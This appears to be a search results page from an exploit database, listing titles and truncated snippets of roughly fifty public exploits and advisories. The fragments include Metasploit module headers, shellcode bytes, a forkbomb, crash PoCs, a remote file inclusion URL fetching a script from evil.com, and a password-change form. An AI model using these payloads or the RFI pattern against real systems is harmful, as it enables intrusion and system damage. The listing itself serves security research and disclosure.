56796 matches found
Novell iPrint Client ActiveX Control ExecuteRequest Buffer Overflow
No description provided by source. $Id: novelliprintexecuterequest.rb 10429 2010-09-21 18:46:29Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing a...
balitbang cms 3.3 - Multiple Vulnerabilities
No description provided by source. !===========================================================================! CMS Balitbang Edit File Vulnerability Author : Xr0b0t [email protected] Homepage : www.indonesiancoder.com | xrobot.mobi | mc-crew.net | exploit-id.com Date : 18 Mart, 2010 Tested on...
CuteFlow 2.11.2 - Arbitrary File Upload Vulnerability
No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core'...
win32k!EPATHOBJ::pprFlattenRec Uninitialized Next Pointer Testcase
No description provided by source. I'm quite proud of this list cycle trick, here's how to turn it into an arbitrary write. First, we create a watchdog thread that will patch the list atomically when we're ready. This is needed because we can't exploit the bug while HeavyAllocPool is failing,...
DieselScripts Diesel Paid Mail Getad.PHP
漏洞类型: 输入验证错误 漏洞文件: Getad.PHP 漏洞危害: 攻击者利用该漏洞可以获取用户cookie,从而执行其他攻击行为 解决方案: 厂商没有补丁,推荐使用加速乐: source: http://www.securityfocus.com/bid/19646/info Paid Mail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to...
WaveMax Sound Editor 4.5.1 - Denial of Service PoC
No description provided by source. Exploit Title: WaveMax Sound Editor 4.5.1 Local Crash PoC Software Link: http://www.wave-max.com/wavemax/ Tested on: Win XP SP3 Date: 04-12-2010 Author: h1ch4m Email: [email protected] my $file= 1.cda; my $junk = \x41 x 1000; open$FILE,$file; print $FILE $junk;...
HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow
No description provided by source. $Id: hpnnmsnmpvieweractapp.rb 12098 2011-03-23 15:47:20Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and...
Dvbbs 7.1/8.2 boardhelp.asp Multiple Parameter XSS
No description provided by source. source: http://www.securityfocus.com/bid/14498/info DVBBS is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary code in the...
UGiA PHP UPLOADER 0.2 - Shell Upload Vulnerability
No description provided by source...
Microsoft URLScan 2.5/ RSA Security SecurID 5.0 Configuration Enumeration Weakness
No description provided by source. source: http://www.securityfocus.com/bid/8419/info A weakness has been discovered in Microsoft URLScan and RSA Security SecurID when used in conjunction on a web server. The problem is said to occur due to the order in which the products are placed within the...
Xomol CMS <= 1.2 Login Bypass / LFI Vulnerabilities
No description provided by source. '/ -.- -------------oOO------OOo------------ | Xomol CMS v1 Login Bypass & LFI | | coded by DNX | ---------------------------------------- ! Discovered.: DNX ! Vendor.....: http://www.xomol.net ! Detected...: 12.05.2008 ! Reported...: 13.05.2008 didn't work: hos...
Siteman 1.1 User Database Privilege Escalation Vulnerability (1)
No description provided by source. source: http://www.securityfocus.com/bid/12304/info Siteman is reported prone to a vulnerability that may allow users to gain elevated privileges. This issue results from insufficient sanitization of user-supplied data. Apparently, an attacker can supply...
PHP-Fusion Mod triscoop_race_system (raceid) SQL Injection Vuln
No description provided by source. PHP-Fusion Mod triscoopracesystem raceid Remote SQL Injection Vulnerability ++++++++++++++++++++++++++++ Author : boom3rang webpage : www.khg-crew.ws greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er - -=Kosova Hackers Group-= ++++++++++++++++++++++++++++ + Dork...
BrowserCRM 0 Results.PHP Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/16435/info BrowserCRM is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary...
dalbum 144 build 174 and earlier CSRF Vulnerabilities
No description provided by source. dalbum 144 build 174 and earlier CSRF Vulnerabilities =================================================================================== Exploit Title:dalbum 144174 and earlier CSRF Vulnerabilities Vendor: http://www.dalbum.org/ Download link...
SendStudio 4.0.1 Cross Site Scripting and Security Bypass Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/37554/info SendStudio also called Email Marketer is prone to a cross-site scripting issue and a security-bypass issue. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecti...
bfcommand & control server 1.22/2.0/2.14 manager Multiple Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/14690/info BFCC and BFVCC server managers are vulnerable to multiple remote vulnerabilities. The first two issues are login bypass vulnerabilities. These issues allow remote, anonymous attackers to gain access to the...
shopmaker cms 2.0 (bsql/ lfi) Multiple Vulnerabilities
No description provided by source. Shopmaker CMS bSQL/LFI Multiple Remote Vulnerabilities ============================================================================== Software : Shopmaker Asp version : version 2.0 Vendor : http://www.shopmaker.dk/ Author : Platen mail: platen.secureatgmail.com...
Dvbbs 7.1/8.2 dispbbs.asp page Parameter XSS
No description provided by source. source: http://www.securityfocus.com/bid/14498/info DVBBS is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary code in the...
Joomla Component com_djcatalog - SQL/bSQL Injection Vulnerabilities
No description provided by source. ----------------------------------------------------------------------------------------- joomla comdjcatalog component SQL/bsql Injection Multiple Vulnerability ----------------------------------------------------------------------------------------- Author :...
V-CMS PHP File Upload and Execute
No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core'...
VWar <= 1.5.0 R15 - (mvcw.php) Remote File Inclusion Vulnerability
No description provided by source. '/ -.- --------------------oOO------OOo-------------------- | VWar = v1.5.0 R15 mvcw.php Remote File Inclusion | | coded by DNX | ------------------------------------------------------- ! Discovered: DNX ! Vendor: http://www.vwar.de ! Detected: 26.02.2007 !...
BES-CMS 0.4/0.5 start.php File Include Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/9268/info It has been reported that BES-CMS is vulnerable to a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. The...
BPDirectory Business Directory Authentication Bypass Vulnerability
No description provided by source. / / / \ \ \ \ \ / / \\ \ \ \ \ // /// \ \ / / \ //|\ / \ \ \ \ \ \ / / \ \ / / \ | | | \ | | || | | |/ / \ V / || |\ V / / \ | / \ | /| | | || / | | | | . | ' || / | || // \ // \|||/|||||||||\ .WEB.ID...
Pointter PHP Content Management System Unauthorized Privilege Escalation
No description provided by source. 'Pointter PHP Content Management System' Unauthorized Privilege Escalation CVE-2010-4332 Mark Stanislav - [email protected] I. DESCRIPTION --------------------------------------- A vulnerability exists in the 'Pointter PHP Content Management System'...
dalbum 1.43 - Multiple Vulnerabilities
No description provided by source. =============================== Vulnerability ID: HTB22941 Reference: http://www.htbridge.ch/advisory/csrfcrosssiterequestforgeryindalbum.html Product: Dalbum Vendor: http://www.dalbum.org/ http://www.dalbum.org/ Vulnerable Version: 1.43 Vendor Notification: 05...
Wireshark 1.2.5 LWRES getaddrbyname BOF - calc.exe
No description provided by source. !/usr/bin/env python Wireshark 1.2.5 LWRES getaddrbyname stack-based buffer overflow Discovered by babi Reference: http://www.exploit-db.com/exploits/11288 Exploit Dev by Nullthreat & Pure|Hate import socket, sys try: host = sys.argv1 except: print usage: +...
Setiran CMS Blind SQL Injection Vulnerability
No description provided by source. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Exploit Title: Setiran CMS Blind SQL injection Vulnerable Date: 1-07-2010 Author: Th3 RDX Software Link: Version: n/a Tested on: Demo Site category: webapp Code : n/a...
CM68 News <= 12.02.06 (addpth) Remote File Inclusion Vulnerability
No description provided by source. Vulnerable Software:cm68news Vulnerable file: /engine/oldnews.inc.php Credits: Paul Bakoyiannis Vulnerable Variable: addpath Example Exploit: http://site.com/cm68news/engine/oldnews.inc.php?addpath=http://evil.com/script.txt?& milw0rm.com 2006-12-08...
irokez blog 0.7.3.2 (xss/rfi/bsql) Multiple Vulnerabilities
No description provided by source. ================================================================================ || Irokez Blog BLIND SQL-INJECTION, INCLUDE, ACTIVE XSS ================================================================================ Application: Irokez Blog ------------ Websit...
SendStudio <= 2004.14 (ROOTDIR) Remote File Inclusion Vulnerability
No description provided by source. \ /\ \ / | \ \ | / \ // / | \ | \ \ Y / | \ / / \ /| /\ / / / / / .OR.ID ECHOADV66$2007 ----------------------------------------------------------------------------------------- ECHOADV66$2007 SendStudio = 2004.14 Remote File Inclusion Vulnerability...
Siteman <= 1.1.10 Remote Administrative Account Addition Exploit
No description provided by source. !/usr/bin/perl -w Exploit by Noam Rathaus - Beyond Security Ltd. Exploit for the SiteMan vulnerability discovered by: amironline452 [email protected] use Digest::MD5 qwmd5 md5hex md5base64; use IO::Socket; use strict; ./siteman.pl / vulnerable.host ...
EasyGallery 1.17 EasyGallery.PHP Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/17624/info EasyGallery is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary...
OpenWFE 1.4.x Remote Cross-Site Scripting And Connection Proxy Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/11514/info OpenWFE is affected by a cross-site scripting and connection proxy vulnerability. These issues are due to a failure of the application to properly sanitize user-supplied input. An attacker may leverage the...
Apple Safari file:// Arbitrary Code Execution
No description provided by source. $Id: safarifilepolicy.rb 13967 2011-10-17 03:49:49Z todb $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of...
Sun xVM VirtualBox < 1.6.4 Privilege Escalation Vulnerability PoC
No description provided by source. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ Sun xVM VirtualBox Privilege Escalation Vulnerability Advisory Information Title: Sun xVM VirtualBox Privilege Escalation...
DvBBS 2.0 'boardrule.php' SQL Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/36282/info DvBBS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the...
Linux x86 forkbombe
No description provided by source. / Title: Linux x86 forkbombe - 6 bytes Author: Jonathan Salwan [email protected] Web: http://www.shell-storm.org ! Database of shellcodes: http://www.shell-storm.org/shellcode/ Disassembly of section .text: 08048054 a: 8048054: b0 02 mov $0x2,%al 8048056: c...
PHP Classifieds 6.20 - Multiple Cross Site Scripting and Authentication Bypass Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/28521/info PHP Classifieds is prone to multiple cross-site scripting vulnerabilities and an authentication-bypass vulnerability. An attacker may leverage these issues to gain unauthorized access to the affected applicatio...
IWebNegar Multiple SQL Injection Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/11946/info iWebNegar is reported prone to multiple SQL injection vulnerabilities, these issues exist due to a lack of sufficient boundary checks performed on user-supplied URI parameter data. These issues could...
Cuteflow Bin 1.5 - pages/showuser.php language Parameter XSS
No description provided by source. source: http://www.securityfocus.com/bid/28500/info CuteFlow Bin is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include a SQL-injection vulnerability and multiple cross-site scriptin...
Firefox 3.5.3 - Local Download Manager Temp File Creation
No description provided by source. / getunique.c AKA Mozilla Firefox 3.5.3 Local Download Manager Exploit Jeremy Brown [email protected] // jbrownsec.blogspot.com // krakowlabs.com 10.28.2009 When downloading files through Firefox and choosing the Open with option, Firefox will create a...
Ciamos CMS <= 0.9.6b (config.php) Remote File Include Exploit
No description provided by source. !/usr/bin/perl use LWP::UserAgent; ::::::::: :::::::::: ::: ::: ::::::::::: ::: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ +:+ +:+ +:+ +:+ +:+ ++ +:+ +++:++ ++ +:+ ++ ++ ++ ++ ++ ++ ++ ++ ++ + + + +++ + + ::::::::::: :::::::::: ::: :::: :::: :+: :+: :+: :+: +:+:+: :+:+...
AJ Auction 1.0 - (id) Remote SQL Injection Vulnerability
No description provided by source. AJ Auction OOPD V.1 SQL Injection Vulnerability ======================================================== Author: Hussin X = = Home : www.tryag.cc/cc = = email: darkangelg85atYahooDoTcom = hussin.xathotmailDoTcom = =...
Solaris/x86 - SystemV killall command - 39 bytes
No description provided by source. / Title: Solaris/x86 - SystemV killall command - 39 bytes Author: Jonathan Salwan submit AT shell-storm.org Web: http://www.shell-storm.org Twitter: http://twitter.com/jonathansalwan ! Database of shellcodes: http://www.shell-storm.org/shellcode/ Date: 2010-06-0...
BitchX <= 1.0c20 Local Buffer Overflow Exploit
No description provided by source. / Tested on BitchX-1.0c19 /str0ke / / P.o.C Exploit Code for BitchX made for Version BitchX-1.0c20cvs -- Date 20020325 C 2004. GroundZero Security Research and Software Development http://www.groundzero-security.com released under the GNU GPL -...
WM Downloader 3.0.0.9 (.asx) Local Buffer Overflow
No description provided by source. !/usr/bin/python Title: WM Downloader 3.0.0.9 .asx Local Buffer Overflow Date: 03-29-2010 Author: b0telh0 Tested on: Windows XP SP3 windows/exec - 227 bytes EXITFUNC=process, CMD=calc.exe shellcode = \x29\xc9\xb1\x33\xda\xd3\xbd\x07\x4a\x9e\x37\xd9\x74\x24\xf4...
D-Link DIR-600 and DIR-300 (rev B) Multiple Vulnerabilities
No description provided by source...
radlance gold 7.5 - Multiple Vulnerabilities
No description provided by source. -----------------------------I AM MUSLIM !!------------------------------ ============================================================================== / \ | | | | / \ | | | | / \ | | | | / \ | || | / \ | | | | / \ | | IN THE NAME OF // \ || || // \ || ||...
Extcalendar <= 2 (profile.php) Remote User Pass Change Exploit
No description provided by source. form name=userform action=http://target/register.php method=post input name=step type=hidden value=regform tr td class='tableh2' colspan='2'Account Information/td /tr tr td class='tableb' width='160'Username/td td class='tableb' /td /tr tr td class='tableb'...